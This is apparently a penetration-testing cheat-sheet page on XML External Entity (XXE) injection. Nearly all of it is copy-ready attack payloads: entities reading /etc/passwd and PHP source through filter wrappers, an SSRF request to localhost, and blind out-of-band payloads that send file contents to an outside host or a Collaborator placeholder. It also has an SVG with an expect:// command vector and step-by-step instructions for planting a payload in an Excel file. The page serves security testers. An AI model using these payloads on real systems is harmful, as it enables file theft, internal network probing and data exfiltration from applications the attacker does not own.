pwny.cc
Search…
XML External Entity (XXE)

Exploiting XXE to retrieve files

Classic XXE

Display content of /etc/passwd.
1
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>
Copied!
1
<?xml version="1.0" encoding="ISO-8859-1"?>
2
<!DOCTYPE foo [
3
<!ELEMENT foo ANY >
4
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]><foo>&xxe;</foo>
Copied!

Classic XXE Base64 encoded

Base64 string == file://etc/passwd
1
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
Copied!

PHP Wrapper inside XXE

1
<?xml version="1.0" encoding="ISO-8859-1"?>
2
<!DOCTYPE foo [
3
<!ELEMENT foo ANY >
4
<!ENTITY % xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php" >
5
]>
6
<foo>&xxe;</foo>
Copied!

Xinclude attack

1
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
2
<xi:include parse="text" href="file:///etc/passwd"/></foo>
Copied!

Exploiting XXE to perform SSRF attacks

1
<?xml version="1.0" encoding="ISO-8859-1"?>
2
<!DOCTYPE foo [
3
<!ELEMENT foo ANY >
4
<!ENTITY % xxe SYSTEM "http://127.0.0.1:5000/secret_pass.txt" >
5
]>
6
<foo>&xxe;</foo>
Copied!

Exploiting blind XXE to exfiltrate data out-of-band

Sometimes you won't have a result outputted in the page but you can still extract the data with an out of band attack.

Blind XXE

The easiest way to test for a blind XXE is to try to load a remote resource such as a Burp Collaborator.
1
<?xml version="1.0" ?>
2
<!DOCTYPE root [
3
<!ENTITY % ext SYSTEM "http://YOURBURCOLLABORATOR.net/x"> %ext;
4
]>
5
<r></r>
Copied!
Send the content of /etc/passwd to www.web.com (you may receive only the first line).
1
<?xml version="1.0" encoding="ISO-8859-1"?>
2
<!DOCTYPE foo [
3
<!ELEMENT foo ANY >
4
<!ENTITY % xxe SYSTEM "file:///etc/passwd" >
5
<!ENTITY callhome SYSTEM "www.web.com/?%xxe;">
6
]
7
>
8
<foo>&callhome;</foo>
Copied!

XXE in weird files

XXE inside SVG

1
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
2
<image xlink:href="expect://ls" width="200" height="200"></image>
3
</svg>
Copied!

XXE inside SOAP

1
<soap:Body>
2
<foo>
3
<![CDATA[<!DOCTYPE doc [<!ENTITY % dtd SYSTEM "http://x.x.x.x:22/"> %dtd;]><xxx/>]]>
4
</foo>
5
</soap:Body>
Copied!

XXE inside XLSX file

Extract the excel file.
1
$ mkdir XXE && cd XXE
2
$ unzip ../XXE.xlsx
3
Archive: ../XXE.xlsx
4
inflating: xl/drawings/drawing1.xml
5
inflating: xl/worksheets/sheet1.xml
6
inflating: xl/worksheets/_rels/sheet1.xml.rels
7
inflating: xl/sharedStrings.xml
8
inflating: xl/styles.xml
9
inflating: xl/workbook.xml
10
inflating: xl/_rels/workbook.xml.rels
11
inflating: _rels/.rels
12
inflating: [Content_Types].xml
Copied!
Add your blind XXE payload inside xl/workbook.xml.
1
<xml...>
2
<!DOCTYPE x [ <!ENTITY xxe SYSTEM "http://YOURCOLLABORATORID.burpcollaborator.net/"> ]>
3
<x>&xxe;</x>
4
<workbook...>
Copied!
Alternativly, add your payload in xl/sharedStrings.xml:
1
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
2
<!DOCTYPE foo [ <!ELEMENT t ANY > <!ENTITY xxe SYSTEM "http://YOURCOLLABORATORID.burpcollaborator.net/"> ]>
3
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="10" uniqueCount="10"><si><t>&xxe;</t></si><si><t>testA2</t></si><si><t>testA3</t></si><si><t>testA4</t></si><si><t>testA5</t></si><si><t>testB1</t></si><si><t>testB2</t></si><si><t>testB3</t></si><si><t>testB4</t></si><si><t>testB5</t></si></sst>
Copied!
Rebuild the Excel file.
1
$ zip -r ../poc.xlsx *
2
updating: [Content_Types].xml (deflated 71%)
3
updating: _rels/ (stored 0%)
4
updating: _rels/.rels (deflated 60%)
5
updating: docProps/ (stored 0%)
6
updating: docProps/app.xml (deflated 51%)
7
updating: docProps/core.xml (deflated 50%)
8
updating: xl/ (stored 0%)
9
updating: xl/workbook.xml (deflated 56%)
10
updating: xl/worksheets/ (stored 0%)
11
updating: xl/worksheets/sheet1.xml (deflated 53%)
12
updating: xl/styles.xml (deflated 60%)
13
updating: xl/theme/ (stored 0%)
14
updating: xl/theme/theme1.xml (deflated 80%)
15
updating: xl/_rels/ (stored 0%)
16
updating: xl/_rels/workbook.xml.rels (deflated 66%)
17
updating: xl/sharedStrings.xml (deflated 17%)
Copied!

References

PayloadsAllTheThings/XXE Injection at master · swisskyrepo/PayloadsAllTheThings
GitHub
XXE Payloads Repository